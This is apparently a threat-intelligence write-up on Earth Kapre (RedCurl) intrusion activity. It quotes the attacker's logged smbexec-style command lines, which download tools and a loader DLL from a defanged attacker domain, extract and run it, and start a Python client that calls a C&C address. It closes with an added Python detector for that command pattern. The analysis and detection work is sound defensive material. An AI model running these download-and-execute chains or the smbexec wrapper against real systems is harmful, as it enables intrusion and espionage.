Unveiling Earth Kapre aka RedCurl’s Cyberespionage Tactics With Trend Micro MDR, Threat Intelligence

After examining the events around the time the file was created, we discovered that the threat actor executed the following actions:

We observed that the initial command uses PowerShell (Invoke-WebRequest, aliased as iwr) to download a file (curl.tmp) from the URL http://preston[.]melaniebest[.]com/ms/curl.tmp and save it as curl.exe in the C:\Windows\System32\ directory. For the benefit of this analysis, we use this domain, but the same analysis should hold for the other domains in the previously mentioned list of URLs. curl.exe is the command-line front end of the curl project (libcurl is the accompanying library), a tool designed for transferring data to and from URLs. While it is a legitimate tool, it can also be abused by threat actors for malicious purposes. Two details are worth a defender's attention: writing into System32 requires administrative rights, so the command is already running with elevated privileges at this point; and Windows 10 version 1803 and later already ship a Microsoft-signed curl.exe in that same directory, so on such hosts this download replaces a signed system binary, and a changed signature or hash on C:\Windows\System32\curl.exe is a useful check.

%COMSPEC% /Q /c echo powershell -c "iwr -Uri http://preston[.]melaniebest[.]com/ms/curl.tmp -OutFile C:\Windows\System32\curl.exe -UseBasicParsing" ^> \\127.0.0.1\C$\dvPqyh 2^>^&1 > %TEMP%\KzIMnc.bat & %COMSPEC% /Q /c %TEMP%\KzIMnc.bat & %COMSPEC% /Q /c del %TEMP%\KzIMnc.bat

Next, 7za.tmp was downloaded with the freshly installed curl.exe and saved as 7za.exe in the C:\Windows\System32\ directory. 7za.exe is the stand-alone console version of 7-Zip, a popular open-source file compression and archiving utility.

C:\Windows\system32\cmd.exe /Q /c echo curl -o C:\Windows\System32\7za.exe http://preston[.]melaniebest[.]com/ms/7za.tmp ^> \\127.0.0.1\C$\xWJhao 2^>^&1 > C:\Windows\TEMP\IAqJUm.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\IAqJUm.bat & C:\Windows\system32\cmd.exe /Q /c del C:\Windows\TEMP\IAqJUm.bat

The Earth Kapre loader was then downloaded using curl.exe from the same domain, http://preston[.]melaniebest[.]com/ms/ms.tmp, and saved as ms.dll (on some machines the file name used was ps.dll) in the C:\Windows\System32\ directory. As in the previous commands, the threat actors echoed the real command into a temporary batch file, executed that batch file, and then deleted it. The caret-escaped redirections (^> and 2^>^&1) are written into the batch file rather than applied to echo itself, so when the batch file runs, the standard output and standard error of the inner command are sent to a randomly named file on the loopback administrative share (\\127.0.0.1\C$\...), from where the operator retrieves them over SMB. This wrapper lets an operator run arbitrary commands one at a time and collect their output without an interactive session, and deleting the batch file afterward leaves little on disk to cover their tracks. It is not, however, an effective evasion against command-line auditing: Windows event 4688 with command-line logging, or Sysmon event 1, records the entire one-liner including the inner command, and the pattern is specific enough to hunt for directly.

C:\Windows\system32\cmd.exe /Q /c echo curl -o C:\Windows\System32\ms.dll http://preston[.]melaniebest[.]com/ms/ms.tmp ^> \\127.0.0.1\C$\tZpOKq 2^>^&1 > C:\Windows\TEMP\DFMPAa.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\DFMPAa.bat & C:\Windows\system32\cmd.exe /Q /c del C:\Windows\TEMP\DFMPAa.bat

Since ms.tmp is a password-protected archive, the threat actors used the previously downloaded 7za.exe (7-Zip) to extract its contents with the password “123”. In the command below, x extracts with full paths, -aoa overwrites existing files without prompting, -p123 supplies the password, and -o sets the destination directory (7-Zip documents that switch with the directory attached, as in -oC:\Windows\Temp\; the command line is reproduced here as it was logged).

C:\Windows\system32\cmd.exe /Q /c echo 7za.exe x -aoa -p123 C:\Windows\Temp\ms.tmp -o C:\Windows\Temp\ ^> \\127.0.0.1\C$\lgNMiK 2^>^&1 > C:\Windows\TEMP\BuWmUA.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\BuWmUA.bat & C:\Windows\system32\cmd.exe /Q /c del C:\Windows\TEMP\BuWmUA

Rundll32.exe was then used to load ms.dll and call its exported function named ms (on some machines, ps.dll was executed instead).

%COMSPEC% /Q /c echo rundll32.exe C:\Windows\system32\ms.dll,ms ^> \\127.0.0.1\C$\NoajCy 2^>^&1 > %TEMP%\YdEcul.bat & %COMSPEC% /Q /c %TEMP%\YdEcul.bat & %COMSPEC% /Q /c del %TEMP%\YdEcul.bat

A Python script, client.py, was staged together with its own interpreter under C:\Users\<username>\AppData\Roaming\MUIService\. The script was crafted to establish outbound communication and execute remote commands using Server Message Block (SMB) via port 445. It is launched with pythonw.exe, the windowless variant of the Python interpreter, so no console window is shown to the user. An external IP address, 198[.]252[.]101[.]86, and a port, 41808, are passed as command-line arguments, suggesting that address's potential role as a C&C server.

"C:\Users\<username>\AppData\Roaming\MUIService\pythonw.exe" C:\Users\<username>\AppData\Roaming\MUIService\rpv\client.py --server-ip 198[.]252[.]101[.]86 --server-port 41808

The presence of Impacket

Impacket is an open-source collection of Python classes for constructing and manipulating network protocols, and it ships with example scripts (smbexec, psexec, wmiexec, and others) for remote command execution over those protocols. Impacket activity was detected in the organization's network. The observed command lines align with Impacket's smbexec script, which provides a semi-interactive shell over SMB: for each command, it creates a service on the target whose binary path is the cmd.exe /Q /c echo ... one-liner seen above, so the command runs with SYSTEM privileges; its output is written to the loopback administrative share and read back by the operator; and the temporary batch file is deleted. Stock smbexec uses a fixed batch file name (execute.bat); the random six-character names seen here suggest a modified build or a reimplementation of the same technique. Threat actors are drawn to Impacket's versatility and exploit its capabilities for unauthorized command execution, as highlighted in this blog entry.
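The following is an added example, not code from the original post or from Trend Micro, that turns the smbexec wrapper described in the command-line walkthrough above and in the Impacket discussion into detection logic: it parses process-creation command lines, recognizes the echo-into-batch pattern with output redirected to \\127.0.0.1\<share>$, pulls out the inner command, the output file and the batch file, and labels the stage (download, archive extraction, DLL execution). The first four sample lines are the command lines quoted in this analysis; the last two are constructed benign lines for contrast. The stage labels, the field names and the SmbexecHit type are this example's own choices, not anything from Impacket or from the incident telemetry.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Sample process-creation command lines (what a Windows 4688 record with command-line
# logging, or a Sysmon event 1, would carry). The first four are the command lines quoted
# in this analysis; the last two are constructed benign lines that must not match.
SAMPLE_COMMAND_LINES = [
    r'%COMSPEC% /Q /c echo powershell -c "iwr -Uri http://preston[.]melaniebest[.]com/ms/curl.tmp -OutFile C:\Windows\System32\curl.exe -UseBasicParsing" ^> \\127.0.0.1\C$\dvPqyh 2^>^&1 > %TEMP%\KzIMnc.bat & %COMSPEC% /Q /c %TEMP%\KzIMnc.bat & %COMSPEC% /Q /c del %TEMP%\KzIMnc.bat',
    r'C:\Windows\system32\cmd.exe /Q /c echo curl -o C:\Windows\System32\7za.exe http://preston[.]melaniebest[.]com/ms/7za.tmp ^> \\127.0.0.1\C$\xWJhao 2^>^&1 > C:\Windows\TEMP\IAqJUm.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\IAqJUm.bat & C:\Windows\system32\cmd.exe /Q /c del C:\Windows\TEMP\IAqJUm.bat',
    r'C:\Windows\system32\cmd.exe /Q /c echo 7za.exe x -aoa -p123 C:\Windows\Temp\ms.tmp -o C:\Windows\Temp\ ^> \\127.0.0.1\C$\lgNMiK 2^>^&1 > C:\Windows\TEMP\BuWmUA.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\BuWmUA.bat & C:\Windows\system32\cmd.exe /Q /c del C:\Windows\TEMP\BuWmUA',
    r'%COMSPEC% /Q /c echo rundll32.exe C:\Windows\system32\ms.dll,ms ^> \\127.0.0.1\C$\NoajCy 2^>^&1 > %TEMP%\YdEcul.bat & %COMSPEC% /Q /c %TEMP%\YdEcul.bat & %COMSPEC% /Q /c del %TEMP%\YdEcul.bat',
    r'C:\Windows\system32\cmd.exe /c echo build ok > C:\Temp\build.log',
    r'C:\Windows\system32\cmd.exe /Q /c echo %PATH% > \\fileserver\share\env.txt',
]

# The smbexec core:  cmd /Q /c echo <command> ^> \\127.0.0.1\<share>$\<file> 2^>^&1 > <file>.bat
# The carets keep the redirections inside the echoed text, so they end up in the .bat; when the
# .bat runs, stdout and stderr of <command> land on the loopback admin share. Only this core is
# required to match, so a line whose trailing "& ... & del ..." was truncated in the log still fires.
SMBEXEC_RE = re.compile(
    r'(?:%COMSPEC%|cmd(?:\.exe)?)\s+/Q\s+/c\s+echo\s+'
    r'(?P<payload>.+?)\s+\^>\s+'
    r'(?P<output>\\\\127\.0\.0\.1\\[A-Za-z]\$\\\S+)\s+'
    r'2\^>\^&1\s+>\s+(?P<batch>\S+\.bat)',
    re.IGNORECASE,
)

# Defanged URLs ("[.]") are kept as-is so the hit can be copied straight into a report.
URL_RE = re.compile(r'https?://[^\s"\']+', re.IGNORECASE)

# Coarse labels for what the echoed command does; first match wins (labels are this example's).
STAGE_PATTERNS = [
    ("download", re.compile(r'\b(?:iwr|Invoke-WebRequest|curl(?:\.exe)?|certutil)\b', re.IGNORECASE)),
    ("archive-extract", re.compile(r'\b7za?(?:\.exe)?\s+[xe]\b', re.IGNORECASE)),
    ("dll-execute", re.compile(r'\brundll32(?:\.exe)?\b', re.IGNORECASE)),
]


@dataclass
class SmbexecHit:
    payload: str                          # the command the operator actually wanted to run
    output_file: str                      # UNC path on the loopback admin share collecting its output
    batch_file: str                       # temporary .bat wrapping it (deleted right after execution)
    stage: str                            # label from STAGE_PATTERNS, or "other"
    urls: List[str] = field(default_factory=list)


def classify_stage(payload: str) -> str:
    for label, pattern in STAGE_PATTERNS:
        if pattern.search(payload):
            return label
    return "other"


def parse_smbexec(cmdline: str) -> Optional[SmbexecHit]:
    """Return the decoded inner command if cmdline follows the smbexec wrapper, else None."""
    m = SMBEXEC_RE.search(cmdline)
    if m is None:
        return None
    payload = m.group("payload")
    return SmbexecHit(
        payload=payload,
        output_file=m.group("output"),
        batch_file=m.group("batch"),
        stage=classify_stage(payload),
        urls=URL_RE.findall(payload),
    )


def triage(cmdlines: List[str]) -> List[SmbexecHit]:
    """Keep only the command lines that match the wrapper, preserving log order."""
    return [hit for hit in map(parse_smbexec, cmdlines) if hit is not None]


if __name__ == "__main__":
    for hit in triage(SAMPLE_COMMAND_LINES):
        print(f"[{hit.stage:15}] {hit.payload}")
        print(f"      output -> {hit.output_file}   batch -> {hit.batch_file}")
        for url in hit.urls:
            print(f"      url -> {url}")
```

Run against the sample lines, the four smbexec wrappers are returned in order as download, download, archive-extract and dll-execute, which reconstructs the staging chain from the logs alone, while the two benign echo-with-redirect lines are ignored because neither writes its output to the loopback admin share through a caret-escaped redirection.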
